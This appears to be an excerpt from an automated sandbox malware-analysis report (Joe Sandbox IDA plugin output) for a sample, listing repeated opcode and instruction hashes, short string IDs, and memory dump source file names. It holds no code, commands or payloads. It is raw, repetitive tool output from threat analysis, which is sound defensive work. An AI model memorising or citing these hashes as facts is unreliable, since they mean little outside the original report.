                                                                                                                                                                                                                                                    • Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                    • Instruction ID: 9274ab75597bf200c71259336d51e5c0dacacdedfecae339c53c319d4058d1f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9C14675A0C3105FD724DFA4CA80ABFFBE6ABD6724F188A2CF58553691D6359C00C792
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: m
                                                                                                                                                                                                                                                    • API String ID: 0-3775001192
                                                                                                                                                                                                                                                    • Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                    • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: 167H
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                    • Opcode ID: 923e186ba11d836a18710eaccf2c9660918ca3872cd95e7859f5c567c501f144
                                                                                                                                                                                                                                                    • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 923e186ba11d836a18710eaccf2c9660918ca3872cd95e7859f5c567c501f144
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                                                    • API String ID: 0-1505114982
                                                                                                                                                                                                                                                    • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                    • Instruction ID: a67abdc19acdaf9768b20f18fd5e1c477683db6a39061193163e33b097102c3a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30C102B5D012168BCB24CF2DCC926BBB7B1FF95310F19865DD895AB790E734A842CB90
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 167H
                                                                                                                                                                                                                                                    • API String ID: 0-2704650348
                                                                                                                                                                                                                                                    • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                    • Instruction ID: bcbcd5068ac972a402ff8eb3a08ba3b90acbcb144b4615d2c081006526254f42
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10D177727087544BD714CF288C817ABB796EFD6324F2A862CE9858B3D1D7359E0587C2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                                                    • API String ID: 0-1505114982
                                                                                                                                                                                                                                                    • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                    • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                    • API String ID: 0-2852464175
                                                                                                                                                                                                                                                    • Opcode ID: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                    • Instruction ID: 0c29c4f326a3360d4f83cd19facfb249d1e6e8dcfa8d7f8eb9091c930c4cf0c7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69D17634B05254CFDB14CF78E8D16AEBBB2AF1A310F6841BDE5519B392CB384906CB59
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &#
                                                                                                                                                                                                                                                    • API String ID: 0-1789715784
                                                                                                                                                                                                                                                    • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                    • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &#
                                                                                                                                                                                                                                                    • API String ID: 0-1789715784
                                                                                                                                                                                                                                                    • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                    • Instruction ID: f0d1e2b156a478091fd61f2b04ab3a427a6db483204a5a1939bbf3f21aba0f67
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAA117A16082105BDB189B2CCC5277BB7E5EF92324F09892CEC9697391E738ED05C392
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                                                    • API String ID: 0-1505114982
                                                                                                                                                                                                                                                    • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                    • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: -
                                                                                                                                                                                                                                                    • API String ID: 0-2547889144
                                                                                                                                                                                                                                                    • Opcode ID: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
                                                                                                                                                                                                                                                    • Instruction ID: d66359e3c76eeaefc235dd7f5d1940aee4e02c11c5cc84b6fd71ea02538bebe3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15D10E71A083464BC718DE29C8D026FBBE7EFC1320F588A1DE4E6473D5DB3899058B91
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: de
                                                                                                                                                                                                                                                    • API String ID: 0-2106599819
                                                                                                                                                                                                                                                    • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                    • Instruction ID: 8594049a64934e3324d87f315e42139a8941e53af1dbe0f078f20811f2e295dc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 239132B19083118BC724DF68C89266BB7F2EFD5324F18992CE4D64B3A1F7789905C792
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ~
                                                                                                                                                                                                                                                    • API String ID: 0-1707062198
                                                                                                                                                                                                                                                    • Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                    • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ~
                                                                                                                                                                                                                                                    • API String ID: 0-1707062198
                                                                                                                                                                                                                                                    • Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                    • Instruction ID: 56dcaee9324729a0d0060c9faf42d4c702fa38504a6eec75890d4bcc159f199f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CA14976A082615FCB25CE2C8C8066AB7E1AFD5324F1A863DECA9973D1D6308D06D7D1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: RpB
                                                                                                                                                                                                                                                    • API String ID: 0-664042118
                                                                                                                                                                                                                                                    • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                    • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: d1
                                                                                                                                                                                                                                                    • API String ID: 0-4211392460
                                                                                                                                                                                                                                                    • Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                    • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: cdef
                                                                                                                                                                                                                                                    • API String ID: 2994545307-4216504194
                                                                                                                                                                                                                                                    • Opcode ID: d9e8f1ee42311986f1eec1db1d15d5cb27079d05f35c354e80ab23b15ff2b9d0
                                                                                                                                                                                                                                                    • Instruction ID: d704160fc5b89d86d9794d8a66ae716d782a0973953182dc9c1641cf0cee7e05
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9e8f1ee42311986f1eec1db1d15d5cb27079d05f35c354e80ab23b15ff2b9d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30815471A083108FC718DF24E88096BBBA2EFDA310F19993DE9D557352C735AC05C786
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: cdef
                                                                                                                                                                                                                                                    • API String ID: 0-4216504194
                                                                                                                                                                                                                                                    • Opcode ID: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                    • Instruction ID: d4ac974407cd73145cdf98a5e49ce2d4b9a8a683fcfeae1db8712f0ba13cee00
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23816631A093508FC724CF24C9909BBBBA5EFD6720F298A3CE9D557295E731AC01C792
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: gfff
                                                                                                                                                                                                                                                    • API String ID: 0-1553575800
                                                                                                                                                                                                                                                    • Opcode ID: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                    • Instruction ID: 191baa27179bbf53c5f17f97c54db3793fdc21ca01ea1b430a22e9c8162e036e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA910271614B428FD718CF7CC891BA6B7D2EB85314F18C63DD09A8B7A6EA78A402C740
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: c$
                                                                                                                                                                                                                                                    • API String ID: 0-2516980088
                                                                                                                                                                                                                                                    • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                    • Instruction ID: 5f5c578c4038417db81b47f54f321756a9c37a7c5c95a47a6fdeb8982401c89c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4891AAB0115741CFEB248F29C4A4B63BBB2FF46314F19958CC4864FBA1E779A846CB94
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: Fg
                                                                                                                                                                                                                                                    • API String ID: 0-875302535
                                                                                                                                                                                                                                                    • Opcode ID: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                    • Instruction ID: 81bd39487229f81fa75b1a19b8121f8c05985a2d1a0f7b16a24bef680633e699
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F81E47121D3808BE768CF25C8657ABBBD2EBD2304F58896DC1C987392DB38440ACB56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: Fg
                                                                                                                                                                                                                                                    • API String ID: 0-875302535
                                                                                                                                                                                                                                                    • Opcode ID: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                    • Instruction ID: c3be0388498e24b97409b0830ef40dc333ce09a5f368b6c121e8f0651a5a4bcd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C481D47161D3808AD7688F24C8617BABBD7EBD2314F18996CD1C987293DB38440ACB56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                    • API String ID: 0-3772416878
                                                                                                                                                                                                                                                    • Opcode ID: 36612c0cc48b75b91a0325b8bf64fc3d4c50c30f81ed3cab0ba6203691dc9cba
                                                                                                                                                                                                                                                    • Instruction ID: 6b9defcb35fa499ff27616791264c6e5e8496363bec20089c87d7e70d31ec12b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36612c0cc48b75b91a0325b8bf64fc3d4c50c30f81ed3cab0ba6203691dc9cba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72B136701087819FC321CF18C88061BBBE0AFA9704F444E6EF5D997382D635E918CBA7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ,
